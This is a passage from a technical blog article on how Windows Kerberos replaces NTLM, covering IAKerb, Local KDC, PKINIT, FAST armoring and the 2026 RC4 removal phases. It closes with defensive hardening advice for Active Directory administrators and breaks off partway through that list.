&lt;p&gt;The pattern is the answer to the section&apos;s opening question. Every control attacks one primitive -- a key, a flag, a coercion path, a ticket lifetime -- and none of them closes &lt;em&gt;the&lt;/em&gt; protocol-level structural property that any long-term symmetric key in the domain is forge-equivalent for any ticket type that key signs. By 2022 the engineering catalogue was complete. The 2023 announcement was the first plan that targeted the structure.&lt;/p&gt;
&lt;p&gt;What would a structural fix even look like, given that any &quot;online revocation&quot; change would also give up Kerberos&apos;s O(1) service-side validation, and given that any &quot;deprecate the long-term key&quot; change has to back-compat to clients that have not been touched since Server 2008? The October 2023 Palko post had answers.&lt;/p&gt;
&lt;h2&gt;6. The Breakthrough: Closing the Domainless Gap&lt;/h2&gt;
&lt;p&gt;October 11, 2023. Matthew Palko, Microsoft&apos;s Principal Group Product Manager for Windows authentication, publishes &quot;The evolution of Windows authentication&quot; on the Windows IT Pro Blog. The article&apos;s &lt;code&gt;&amp;lt;meta property=&quot;article:modified_time&quot;&amp;gt;&lt;/code&gt; reads &lt;code&gt;2023-11-11T01:30:49.108-08:00&lt;/code&gt; in the raw HTML; the description metadata reads &quot;Discover how we&apos;re securing authentication and reducing NTLM usage in Windows&quot; [@ms-palko-evolution]. It is the first time Microsoft commits publicly to deprecating NTLM, and the first time Microsoft names the three load-bearing engineering features that move Kerberos from &quot;domain-only&quot; to &quot;load-bearing-for-everything&quot;.&lt;/p&gt;
&lt;p&gt;The plan has four moving parts. Each one closes a specific reason that NTLM survived for thirty years.&lt;/p&gt;
&lt;h3&gt;IAKerb: Kerberos without KDC line-of-sight&lt;/h3&gt;
&lt;p&gt;The structural reason NTLM lived through Server 2003, Server 2008, Server 2012, and Server 2019 is that Windows had no Kerberos-equivalent path for the case where a client cannot reach a KDC. A laptop on a hotel network, a hybrid Azure-joined workstation that can reach the application server but not the AD DC, a workgroup machine attempting to access a domain file share -- all of those flowed back to NTLM by default, because Kerberos required a working AS-REQ to the domain controller before it could mint a TGT.&lt;/p&gt;
&lt;p&gt;IAKerb (Initial and Pass Through Authentication Using Kerberos V5 and the GSS-API) closes that gap. The draft IETF specification, draft-ietf-kitten-iakerb, is by Benjamin Kaduk, Jim Schaad, Larry Zhu, and Jeffrey E. Altman [@iakerb-draft]. The mechanism is GSS-API encapsulation: the client wraps each AS-REQ, AS-REP, TGS-REQ, and TGS-REP message inside a GSS-API token addressed to the application server, and the application server proxies the token to the KDC the server &lt;em&gt;can&lt;/em&gt; reach. From the client&apos;s perspective, it is talking to the application server; from the KDC&apos;s perspective, the AS exchange came from the application server. The protocol&apos;s verbatim problem statement reads: &quot;encapsulating the Kerberos messages inside GSS-API tokens. With these extensions a client can obtain Kerberos tickets for services where the KDC is not accessible to the client, but is accessible to the application server&quot; [@iakerb-draft].&lt;/p&gt;

Initial and Pass Through Authentication Using Kerberos V5 and the GSS-API. An extension to GSS-API Kerberos (RFC 4121) that encapsulates Kerberos AS / TGS exchanges inside GSS-API tokens between client and application server, so the application server can proxy them to a KDC the server can reach but the client cannot. Documented in the IETF draft `draft-ietf-kitten-iakerb` by Kaduk, Schaad, Zhu, and Altman [@iakerb-draft].

A Kerberos Key Distribution Center implemented as an in-process service inside the local Windows Security Authority (LSASS) on a workgroup or Azure-joined machine. The Local KDC issues tickets backed by the local SAM password database, exposing no Kerberos port to the network; clients reach it only through IAKerb encapsulation tunnelled through the application protocol. Closes the &quot;local account auth has no KDC&quot; gap that has kept NTLM alive for workgroups since Windows NT 3.1 [@ms-palko-evolution] [@fosdem-localkdc].
&lt;p&gt;MIT krb5 added IAKERB support fifteen years ago. The README for krb5-1.9, released December 22, 2010, says verbatim: &quot;Add support for IAKERB -- a mechanism for tunneling Kerberos KDC transactions over GSS-API, enabling clients to authenticate to services even when the clients cannot directly reach the KDC that serves the services&quot; [@mit-krb5-19-readme] [@mit-krb5-19-page]. The capability sat in MIT&apos;s mainline Kerberos for over a decade. Windows did not ship the equivalent because, until NTLM was on a deprecation path, Windows did not need it -- NTLM filled the line-of-sight gap. Once NTLM was on the road to removal, IAKerb stopped being optional.
The sixteen-year gap between MIT krb5-1.9 IAKERB (December 22, 2010) and Microsoft&apos;s planned H2 2026 broad enable is the cleanest evidence that Microsoft&apos;s NTLM deprecation is the &lt;em&gt;forcing function&lt;/em&gt; for the Kerberos refit, not a side effect. The specification was waiting for the customer demand to catch up.&lt;/p&gt;
&lt;h3&gt;Local KDC: Kerberos for the workgroup&lt;/h3&gt;
&lt;p&gt;The second structural reason NTLM survived was that Windows local accounts had no concept of &quot;domain&quot;. Without an AD domain, there was no KDC. Without a KDC, there were no Kerberos tickets. Local-account authentication therefore flowed through NT challenge-response (NTLMv2) by default.&lt;/p&gt;
&lt;p&gt;Local KDC closes this. The Local KDC, shipping in Windows 11 24H2 and Server 2025 with broad enablement targeted for H2 2026 [@ms-palko-evolution], is a Kerberos KDC built directly on top of the local SAM database. LSA derives an AES-256 long-term key from the local account&apos;s password rather than persisting the legacy RC4 NT hash. The Local KDC exposes no listening Kerberos port; clients reach it only through IAKerb encapsulation inside the application protocol (SMB, RDP, HTTP).&lt;/p&gt;
&lt;p&gt;The parallel open-source path was demonstrated by Alexander Bokovoy and Andreas Schneider at FOSDEM 2025, where they presented &quot;localkdc: A General Local Authentication Hub&quot; [@fosdem-localkdc]. The abstract reads verbatim: &quot;A local Kerberos Key Distribution Center (KDC) is not a new invention. It is a useful tool in combination with the Kerberos IAKerb extension but also allows to map SSO from a web authentication to local authentication or in a network environment isolated from the rest of the enterprise environment ... how use of NTLM in SMB protocol will be replaced by a localkdc in combination with IAKerb&quot; [@fosdem-localkdc]. Samba 4.21 carries the prototype implementation.&lt;/p&gt;

The Bokovoy / Schneider talk is the cleanest external evidence that Local KDC is a *protocol-level* architecture, not a Microsoft-proprietary one. Samba, Heimdal, MIT krb5, and Microsoft are converging on the same design: an in-process KDC, GSS-API-tunnelled Kerberos exchanges, AES-keyed local accounts. The IETF draft-ietf-kitten-iakerb specification [@iakerb-draft] is the shared standardisation layer.

Add support for IAKERB -- a mechanism for tunneling Kerberos KDC transactions over GSS-API, enabling clients to authenticate to services even when the clients cannot directly reach the KDC that serves the services. -- MIT krb5-1.9 release notes, December 22, 2010 [@mit-krb5-19-readme]
&lt;h3&gt;PKINIT and the freshness extension&lt;/h3&gt;
&lt;p&gt;The third gap NTLM filled was non-password credentials. Windows Hello for Business, smart cards, and Federal Information Processing Standard token logon all need to translate &quot;I hold this private key&quot; into &quot;I hold this Kerberos TGT&quot;. PKINIT (Public Key Cryptography for Initial Authentication in Kerberos), RFC 4556, by Larry Zhu (Microsoft) and Brian Tung (Aerospace Corporation), is the protocol for that [@rfc4556]. The AS-REQ carries a &lt;code&gt;PA-PK-AS-REQ&lt;/code&gt; PA-DATA element wrapping an &lt;code&gt;AuthPack&lt;/code&gt; CMS structure signed by the client&apos;s private key; the AS-REP carries a TGT encrypted to &lt;code&gt;krbtgt&lt;/code&gt; (opaque to the client) alongside a client-visible reply part protected by a reply key established through RSA key transport or Diffie-Hellman key agreement, and decrypting that reply part yields the TGT session key.&lt;/p&gt;
&lt;p&gt;The 2006 RFC 4556 PKINIT had a replay window: an attacker who recorded a &lt;code&gt;signedAuthPack&lt;/code&gt; could replay it indefinitely until the client&apos;s certificate expired. RFC 8070, &quot;PKINIT Freshness Extension,&quot; by Michiko Short, Seth Moore, and Peter Miller of Microsoft (February 2017) closed it [@rfc8070]. The AS-REP issues an opaque &lt;code&gt;PA-AS-FRESHNESS&lt;/code&gt; blob in a preliminary KDC-error round-trip; the client must echo the blob in its next signed AS-REQ; replays after the freshness window fail. Verbatim from RFC 8070 abstract: &quot;exchange an opaque data blob that a Key Distribution Center (KDC) can validate to ensure that the client is currently in possession of the private key during a PKINIT Authentication Service (AS) exchange&quot; [@rfc8070].&lt;/p&gt;
&lt;p&gt;Together, RFC 4556 plus RFC 8070 anchor every modern non-password Windows credential: Windows Hello for Business, smart-card logon, FIDO2 keys mediated by Windows Hello, and the upcoming Entra-issued cloud TGTs. The 2022 Certifried CVE [@cve-2022-26923] forced the &lt;em&gt;strong-mapping&lt;/em&gt; layer on top of all of this: every certificate used for PKINIT must carry an X.509 extension binding it to a specific AD account SID. KB5014754 [@ms-kb-5014754] tracks the rollout; see §4 for the full Compatibility / Enforcement / rollback-removal date sequence.&lt;/p&gt;
&lt;h3&gt;FAST armoring as default&lt;/h3&gt;
&lt;p&gt;The fourth gap was the trust assumption at the start of an AS-REQ: the encrypted-timestamp pre-auth blob, &lt;code&gt;PA-ENC-TIMESTAMP&lt;/code&gt;, is keyed under the client&apos;s password-derived key, which is offline-crackable on observation. FAST (RFC 6113) wraps the AS-REQ inside an armor envelope keyed under a separate key the attacker does not see [@rfc6113]. In a domain-joined client the armor key is derived from the machine account&apos;s TGT; in a non-domain-joined client it is derived from an anonymous PKINIT TGT; in a compound-identity scenario it is the combination of both.&lt;/p&gt;
&lt;p&gt;What changes in the 2023 plan is the &lt;em&gt;default-on&lt;/em&gt; posture: Authentication Policy Silos can now require FAST for every AS-REQ from a silo member, and Local KDC clients use anonymous PKINIT armoring out of the box because the SAM-derived long-term key is the only credential available and offline-crackability would be catastrophic.&lt;/p&gt;

sequenceDiagram
    participant C as Client (no KDC reach)
    participant S as Application Server
    participant KDC as KDC (reachable from S)
    C-&amp;gt;&amp;gt;S: GSS-API token: IAKerb (AS-REQ wrapper)
    S-&amp;gt;&amp;gt;KDC: AS-REQ (forwarded)
    KDC-&amp;gt;&amp;gt;S: AS-REP (forwarded)
    S-&amp;gt;&amp;gt;C: GSS-API token: IAKerb (AS-REP wrapper)
    C-&amp;gt;&amp;gt;S: GSS-API token: IAKerb (TGS-REQ wrapper)
    S-&amp;gt;&amp;gt;KDC: TGS-REQ (forwarded)
    KDC-&amp;gt;&amp;gt;S: TGS-REP (forwarded)
    S-&amp;gt;&amp;gt;C: GSS-API token: IAKerb (TGS-REP wrapper)
    C-&amp;gt;&amp;gt;S: AP-REQ presenting service ticket
    S-&amp;gt;&amp;gt;C: AP-REP -- session established
&lt;h3&gt;The Gap-to-Closure Mapping&lt;/h3&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;NTLM-fallback gap&lt;/th&gt;
&lt;th&gt;Engineered closure&lt;/th&gt;
&lt;th&gt;Primary source&lt;/th&gt;
&lt;th&gt;Ship target&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;Client has no KDC line-of-sight&lt;/td&gt;
&lt;td&gt;IAKerb GSS-API encapsulation&lt;/td&gt;
&lt;td&gt;[@iakerb-draft]&lt;/td&gt;
&lt;td&gt;Windows 11 24H2 / Server 2025; broad enable H2 2026 [@ms-palko-evolution]&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Local accounts have no domain KDC&lt;/td&gt;
&lt;td&gt;Local KDC on SAM + AES-256 derivation&lt;/td&gt;
&lt;td&gt;[@ms-palko-evolution] [@fosdem-localkdc]&lt;/td&gt;
&lt;td&gt;Windows 11 24H2 / Server 2025&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Non-password credentials need an AS path&lt;/td&gt;
&lt;td&gt;PKINIT (RFC 4556) + Freshness (RFC 8070) + strong mapping (KB5014754)&lt;/td&gt;
&lt;td&gt;[@rfc4556] [@rfc8070] [@ms-kb-5014754]&lt;/td&gt;
&lt;td&gt;Enforcement February 11, 2025; Disabled mode removed April 2023; Compatibility mode removed Sept 9, 2025&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;AS-REQ pre-auth is offline-crackable&lt;/td&gt;
&lt;td&gt;FAST armoring (RFC 6113) default-on in silos&lt;/td&gt;
&lt;td&gt;[@rfc6113]&lt;/td&gt;
&lt;td&gt;Available since Server 2012 R2; default-on with new silos&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;After thirty-three years of layered extensions, Kerberos in 2026 is finally a single-protocol authentication path for every Windows scenario. Domain-joined, workgroup, Azure-joined without AD line-of-sight, local-account to local-account. The mechanism that closes the last gap -- IAKerb -- is a sixteen-year-old MIT protocol coming to Windows for the first time. What&apos;s left for Kerberos to fix is encryption-type hygiene, and a December 2025 Microsoft post named the calendar dates for that too.&lt;/p&gt;
&lt;h2&gt;7. The Beyond-RC4 Cadence&lt;/h2&gt;
&lt;p&gt;December 3, 2025. The Microsoft Windows Server Blog publishes &quot;Beyond RC4 for Windows authentication&quot; [@ms-beyond-rc4]. The post is short and specific. Verbatim: &quot;By mid-2026, we will be updating the domain controller default assumed supported encryption types. The assumed supported encryption types is applied to service accounts that do not have an explicit configuration defined. Secure Windows authentication does not require RC4; AES-SHA1 can be used across all supported Windows versions since it was introduced in Windows Server 2008&quot; [@ms-beyond-rc4]. For the first time in twenty years, RC4-HMAC is on a removal cadence with a calendar date and an enforcement CVE.&lt;/p&gt;
&lt;p&gt;The rollout has three phases.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Phase 1, January 2026, audit only.&lt;/strong&gt; Domain controllers gain new fields in Event ID 4768 (TGT issued) and Event ID 4769 (TGS issued): &lt;code&gt;msDS-SupportedEncryptionTypes&lt;/code&gt;, &lt;code&gt;Available Keys&lt;/code&gt;, and &lt;code&gt;Session Encryption Type&lt;/code&gt;. The fields tell an administrator, for each ticket issued, which enctypes the requesting account had configured and which one the KDC actually chose. Two new PowerShell auditing scripts ship in the &lt;code&gt;microsoft/Kerberos-Crypto&lt;/code&gt; GitHub repository: &lt;code&gt;List-AccountKeys.ps1&lt;/code&gt; enumerates every account and the enctype configuration on each; &lt;code&gt;Get-KerbEncryptionUsage.ps1&lt;/code&gt; parses the 4768 / 4769 log stream and prints accounts still requesting or being issued RC4 tickets [@ms-beyond-rc4]. Verbatim from the post: &quot;we have enhanced existing information within the Security Event Log and developed new PowerShell auditing scripts. These enhancements are available in Windows Server versions 2019, 2022, and 2025&quot; [@ms-beyond-rc4].&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Phase 2, April 2026, default flip.&lt;/strong&gt; The &quot;assumed&quot; &lt;code&gt;msDS-SupportedEncryptionTypes&lt;/code&gt; on accounts that have no explicit setting changes from &quot;anything the client asks for, including RC4&quot; to &quot;AES-SHA1 only&quot;. AES-SHA1 (RFC 3962 enctypes 17 and 18) has shipped on every supported Windows version since Server 2008 [@rfc3962], so the flip is theoretically backward-compatible with every domain-joined client; in practice the casualties are third-party Kerberos clients (legacy Linux MIT krb5 with RC4-only keytabs, network-attached-storage appliances stuck on older krb5 libraries, SQL Server linked servers with manually-configured service-principal RC4 entries).&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Phase 3, mid-2026, enforcement.&lt;/strong&gt; RC4 tickets require explicit per-account opt-in. The enforcement boundary is &lt;em&gt;CVE-2026-20833&lt;/em&gt;, called out by name in the Microsoft post [@ms-beyond-rc4]. After that date, an account that has not had &lt;code&gt;msDS-SupportedEncryptionTypes&lt;/code&gt; explicitly written to include &lt;code&gt;0x4&lt;/code&gt; (RC4) will not be issued RC4 tickets, and DCs will reject any TGS-REQ that asks for one against an account configured AES-only.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; The mid-2026 RC4-default removal is gated on CVE-2026-20833, named in the December 2025 &quot;Beyond RC4&quot; post as the enforcement boundary [@ms-beyond-rc4]. The audit window closes when this date lands. Production environments that have not migrated their service accounts to gMSA or explicitly set &lt;code&gt;msDS-SupportedEncryptionTypes&lt;/code&gt; will find Kerberos authentication failing for those accounts the day Phase 3 ships.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The interesting question is why the migration destination is AES-SHA1 (enctypes 17 and 18) and not AES-SHA2 (enctypes 19 and 20). RFC 8009 specifies AES-SHA2 [@rfc8009]; Microsoft&apos;s &lt;code&gt;[MS-KILE]&lt;/code&gt; §2.2.7 supported-encryption-types bit table includes bits K (&lt;code&gt;AES128-CTS-HMAC-SHA256-128&lt;/code&gt;) and L (&lt;code&gt;AES256-CTS-HMAC-SHA384-192&lt;/code&gt;) [@ms-kile-227]. Linux MIT krb5 has shipped RFC 8009 since version 1.15 (December 2016) [@mit-krb5-115]. Cross-domain interoperability between AES-SHA2 Windows and AES-SHA2 MIT works. The remaining work is purely Microsoft-side default enablement and the auditing infrastructure analogous to the RC4 cadence.&lt;/p&gt;
&lt;p&gt;The Beyond-RC4 post does not name an AES-SHA1 -&amp;gt; AES-SHA2 timeline at all. The audit-default-enforce cadence Microsoft has now demonstrated for RC4 -- audit instrumentation in event logs, default flip with backward-compatible enctypes, enforcement gated by a named CVE -- has no announced analogue for AES-SHA1 yet.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; The cadence Microsoft has is audit, default, enforce. The RC4 to AES-SHA1 transition has all three: audit instrumentation in Phase 1, the default flip in Phase 2, and named enforcement via CVE-2026-20833 in Phase 3. The AES-SHA1 to AES-SHA2 transition has none. The [MS-KILE] bits exist; the cross-domain interoperability works; the Microsoft-side rollout is the missing piece.
The &lt;code&gt;microsoft/Kerberos-Crypto&lt;/code&gt; GitHub repository ships the two PowerShell auditing scripts (&lt;code&gt;List-AccountKeys.ps1&lt;/code&gt;, &lt;code&gt;Get-KerbEncryptionUsage.ps1&lt;/code&gt;) that the December 2025 post names as the Phase 1 instrumentation. They are the right tools for an administrator who wants to find their RC4-dependent service accounts before the audit window closes mid-2026 [@ms-beyond-rc4].&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Mid-2026 is the audit-window-closes date. The question for every AD operator is &lt;em&gt;which&lt;/em&gt; of their service accounts will still be requesting RC4 tickets when the default flips, and whether their detection tooling sees them in the window. Two quarters from now, the answer &quot;we&apos;ll just turn RC4 off and see what breaks&quot; stops being a defensible operating posture.&lt;/p&gt;

timeline
    title Beyond-RC4 rollout
    section Phase 1 -- Audit
      Jan 2026 : Event 4768 / 4769 fields msDS-SupportedEncryptionTypes Available Keys Session Encryption Type
      Jan 2026 : Kerberos-Crypto GitHub repo with List-AccountKeys.ps1 and Get-KerbEncryptionUsage.ps1
    section Phase 2 -- Default flip
      Apr 2026 : Assumed msDS-SupportedEncryptionTypes flips to AES-SHA1-only for accounts without explicit configuration
    section Phase 3 -- Enforcement
      Mid 2026 : CVE-2026-20833 enforcement boundary -- RC4 tickets require explicit per-account opt-in
&lt;h2&gt;8. What Removing NTLM Cannot Buy You&lt;/h2&gt;
&lt;p&gt;After everything in Section 6 and Section 7 ships, Kerberos in 2026 is still vulnerable to four classes of attack. None of them are protocol bugs; all of them are protocol &lt;em&gt;structure&lt;/em&gt;.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Kerberos has its own relay class.&lt;/strong&gt; The KrbRelayUp README explicitly scopes itself to Windows domain environments where LDAP signing is not enforced -- the post-NTLM cousin of NTLM-relay [@krbrelayup]. The relay primitive survives the move from NTLM to Kerberos because the attack does not target the authentication protocol -- it targets the LDAP protocol&apos;s lack of mandatory integrity, and any authenticated bind (Kerberos or NTLM) is fair game once the channel is unsigned. The dispositive control is LDAP signing plus channel binding domain-wide, plus Extended Protection for Authentication on every AD CS Web Enrolment endpoint. It is a configuration, not a protocol fix. The &lt;a href=&quot;https://paragmali.com/blog/ntlmless-the-death-of-ntlm-in-windows/&quot; rel=&quot;noopener&quot;&gt;NTLMless&lt;/a&gt; companion article walks through the LDAP-side work in detail.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;The long-term-key problem is intrinsic to symmetric Kerberos.&lt;/strong&gt; Whoever holds the &lt;code&gt;krbtgt&lt;/code&gt; account&apos;s long-term key forges any TGT (the Golden Ticket primitive). Whoever holds an SPN account&apos;s long-term key forges any TGS for that service (the Silver Ticket primitive). RFC 4120&apos;s offline-validation property [@rfc4120] &lt;em&gt;requires&lt;/em&gt; that the service trust the key alone -- the AP-REQ contains no callback to the KDC; the service decrypts the ticket, validates the signatures, and decides. Any change that adds an online &quot;is this ticket still valid?&quot; check also gives up Kerberos&apos;s O(1) service-side scaling and the offline-validation guarantee that makes the protocol cheap. Authentication Policy Silos, Protected Users, TPM-backed credentials, and Credential Guard all raise the cost of obtaining the key; they do not close the forge-equivalence property. Mathematically, if you have the key, you are the principal.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;The PAC is a signed vouching token, not a verified live query.&lt;/strong&gt; KrbtgtFullPacSignature [@cve-2022-37967] closes the &lt;em&gt;modification&lt;/em&gt; side (PAC tampering by parties that do not hold the krbtgt key). It does not close the &lt;em&gt;staleness&lt;/em&gt; side. A user removed from &lt;code&gt;Domain Admins&lt;/code&gt; at 09:00 still presents service tickets attesting Domain Admin membership until the ticket expires (default 10 hours user TGT, 7 days renewable; Protected Users members are capped at 4 hours [@ms-protected-users]). The PAC vouching window is the residual stale-authorization gap. The defender&apos;s option is shorter ticket lifetimes or out-of-band ACL flips at the service tier; the protocol itself has no callback by which a service learns about a group-membership change before the ticket expires.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Domainless does not mean keyless.&lt;/strong&gt; Local KDC binds the SAM password to an AES-256 long-term key. The wire form of pass-the-hash is gone: there is no NT hash on the line, no &lt;code&gt;LMv2&lt;/code&gt; challenge response, no DES-CBC-MD5 keytab. But a &lt;code&gt;NT AUTHORITY\SYSTEM&lt;/code&gt;-level attacker on the box still recovers the AES key, because LSA must materialise that key in user-mode memory to hand it to Kerberos. The chip- and VBS-based countermeasures (TPM-backed credentials, Microsoft Pluton, Credential Guard) remain orthogonal and necessary; none of them is replaced by Local KDC.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Key idea:&lt;/strong&gt; H2 2026 ships Kerberos as the load-bearing single authentication protocol; it does not ship a Kerberos in which (1) the Kerberos-relay class is closed, (2) long-term-key forge-equivalence is closed, (3) PAC staleness is closed, or (4) local-key recovery from a SYSTEM-level attacker on the box is closed. The arc is a transition between tradeoffs, not out of them.&lt;/p&gt;
&lt;/blockquote&gt;

The Phase-3-as-transition-between-tradeoffs framing is mirrored in the [NTLMless](/blog/ntlmless-the-death-of-ntlm-in-windows/) companion article&apos;s Section 8 -- the symmetric framing is deliberate. Read the two articles together as a paired diagnosis: NTLMless is the eulogy and the migration story; this article is the inheritance and the to-do list.
&lt;h2&gt;9. Open Problems and the 2026-2027 Edge&lt;/h2&gt;
&lt;p&gt;Five problems sit on the May-2026 research agenda. None has a shipping Microsoft answer.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;The AES-SHA1 to AES-SHA2 Windows-default timeline.&lt;/strong&gt; RFC 8009 [@rfc8009] is nine years old. The &lt;code&gt;[MS-KILE]&lt;/code&gt; §2.2.7 supported-encryption-types bit table already includes the AES-SHA2 bits K and L [@ms-kile-227]. Linux MIT krb5 shipped RFC 8009 in version 1.15 (December 2016) [@mit-krb5-115]. Cross-domain Kerberos interop between MIT clients and Windows DCs over AES-SHA2 works in the laboratory. What is missing is a Microsoft-side equivalent of the audit / default / enforce cadence already in place for the RC4 transition, especially because the hard part is not the cryptography but the long tail of third-party Kerberos clients and pre-2017 keytabs that an AES-SHA2 audit would have to enumerate before the default can flip. The 8009 cadence is the largest Windows-side cryptographic gap that has no announcement.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Quantum risk.&lt;/strong&gt; Kerberos symmetric primitives (AES-128 and AES-256) retain a Grover-bound effective security margin of 64 and 128 bits respectively, which is durable against the near-term cryptographically-relevant quantum computer. PKINIT is the exposed half: the CMS signature chains in &lt;code&gt;AuthPack&lt;/code&gt; are RSA or ECDSA per RFC 4556 §3.2 [@rfc4556], and both are broken by Shor&apos;s algorithm. Anonymous PKINIT, used for FAST armoring on non-domain-joined clients, has the same exposure. Microsoft has not announced a PKINIT-specific post-quantum cryptography plan; the Kerberos team&apos;s standardisation tracking sits on the IETF kitten working group&apos;s queue rather than on a shipping Windows roadmap. Cross-link to the post-quantum cryptography sibling article in this series.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;dMSA field-deployment maturity.&lt;/strong&gt; Server 2025 introduced Delegated Managed Service Accounts as the successor to gMSA [@ms-dmsa]. The protocol-level differences -- &quot;Authentication for dMSA is linked to the device identity ... dMSA uses a randomized secret (derived from the machine account credential) that is held by the Domain Controller (DC) to encrypt tickets&quot; -- close several gMSA gaps, including the multi-tenant-key problem. But the 14-day account-migration window, the four-ticket-lifetime startup state during which both the legacy account and the dMSA can authenticate, and the cross-domain plus cross-forest behaviours are still being shaken out in field deployments. As of the May 2026 reading, dMSA is shipping but not yet the default for new service accounts.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Cross-cloud Kerberos.&lt;/strong&gt; Kerberos Cloud Trust for Windows Hello for Business is the architectural piece that lets an Azure-joined laptop obtain TGTs from Entra ID rather than from an on-premises DC, with the on-premises DC trusting Entra&apos;s signatures via federation. Per [@ms-palko-evolution] the architecture is planned but unproven in the field at scale. The role of Local KDC in pure-Entra (no AD on-prem) deployments is still being defined. The trust graph for &quot;Local KDC + Entra ID + on-premises AD&quot; is one of the open architectural problems the Palko post mentions but does not yet detail.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Open-source IAKerb and Local KDC.&lt;/strong&gt; Samba&apos;s &lt;code&gt;localkdc&lt;/code&gt; work, demonstrated by Alexander Bokovoy and Andreas Schneider at FOSDEM 2025 [@fosdem-localkdc], is the most public open-source mirror of Microsoft&apos;s Local KDC plan. Heimdal has a partial implementation. MIT krb5 IAKERB has been shipping since krb5-1.9 on December 22, 2010 [@mit-krb5-19-readme] and is mature. The Local-KDC-on-the-SAM pattern is new to the Windows world specifically; in the open-source world the equivalent (a Kerberos KDC fed from a local user database) has existed in textbooks since Kerberos v4.&lt;/p&gt;
&lt;p&gt;Each of the five problems is a residual. Each is the next decade&apos;s research. None of them invalidates the Phase 3 shipping commitment. The article&apos;s load-bearing closing claim is honest about that: H2 2026 is a &lt;em&gt;transition&lt;/em&gt;, and what comes next will be its own multi-year cadence.&lt;/p&gt;
&lt;h2&gt;10. What an AD Engineer Should Do This Quarter&lt;/h2&gt;
&lt;p&gt;If you read nothing else from this article, read this. Seven controls; each one is tied to one primary Microsoft Learn or MSRC URL; each one closes one of the attack primitives in Section 4. Cross-link to the parallel practical-guide section in the &lt;a href=&quot;https://paragmali.com/blog/ntlmless-the-death-of-ntlm-in-windows/&quot; rel=&quot;noopener&quot;&gt;NTLMless&lt;/a&gt; companion article.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Run the two PowerShell scripts in &lt;code&gt;microsoft/Kerberos-Crypto&lt;/code&gt;: &lt;code&gt;List-AccountKeys.ps1&lt;/code&gt; enumerates every account&apos;s configured enctypes; &lt;code&gt;Get-KerbEncryptionUsage.ps1&lt;/code&gt; parses your Event 4768 / 4769 stream and lists accounts still requesting or being issued RC4 tickets. The audit window closes mid-2026 when Phase 2 flips the default [@ms-beyond-rc4]. Every account on the list above is a Phase-3 production incident if you do nothing.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Do not rely on the mid-2026 default flip. Explicitly write &lt;code&gt;msDS-SupportedEncryptionTypes&lt;/code&gt; with the value &lt;code&gt;0x18&lt;/code&gt; (AES-128 + AES-256, no RC4) on every service account that does not have a documented RC4 dependency. For service accounts that do, write &lt;code&gt;0x1C&lt;/code&gt; (AES-128 + AES-256 + RC4) and put a calendar reminder against the RC4 dependency so it gets remediated before Phase 3 [@ms-beyond-rc4].&lt;/p&gt;
&lt;/blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Manually-managed service-account passwords are the Kerberoasting attack surface per [@ms-kerberoasting-guidance]. gMSA gives you 240-character KDS-derived passwords rotated every 30 days [@ms-gmsa]. dMSA on Server 2025 binds the account secret to the device identity and stores it only on the domain controller, where it can be further protected by Credential Guard [@ms-dmsa]. There is no service-account workflow gMSA or dMSA does not cover; the migration is operational, not architectural.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Setting &lt;code&gt;ms-DS-MachineAccountQuota&lt;/code&gt; on the domain root to zero kills the first step of the RBCD chain in Section 1 [@shenanigans-rbcd] and the KrbRelayUp chain [@krbrelayup]. The default value of 10 has been the de facto attack-surface enabler since Windows 2000. The control is one PowerShell line: &lt;code&gt;Set-ADDomain -Identity (Get-ADDomain) -Replace @&amp;amp;#123;&apos;ms-DS-MachineAccountQuota&apos;=0&amp;amp;#125;&lt;/code&gt;. The breakage surface is small: only legitimate computer-account bootstrap workflows that today rely on user-driven &lt;code&gt;djoin.exe&lt;/code&gt;.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Protected Users gives every member the five non-configurable client protections plus the 4-hour TGT cap [@ms-protected-users]. Wrap an Authentication Policy Silo around the same population to add mandatory FAST armoring [@rfc6113] and per-silo logon-from constraints. Both controls have been available since Server 2012 R2; the operational reason most environments still have not adopted them is the breakage in legacy delegation workflows. Audit and remediate those workflows; do not skip Protected Users.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;blockquote&gt;
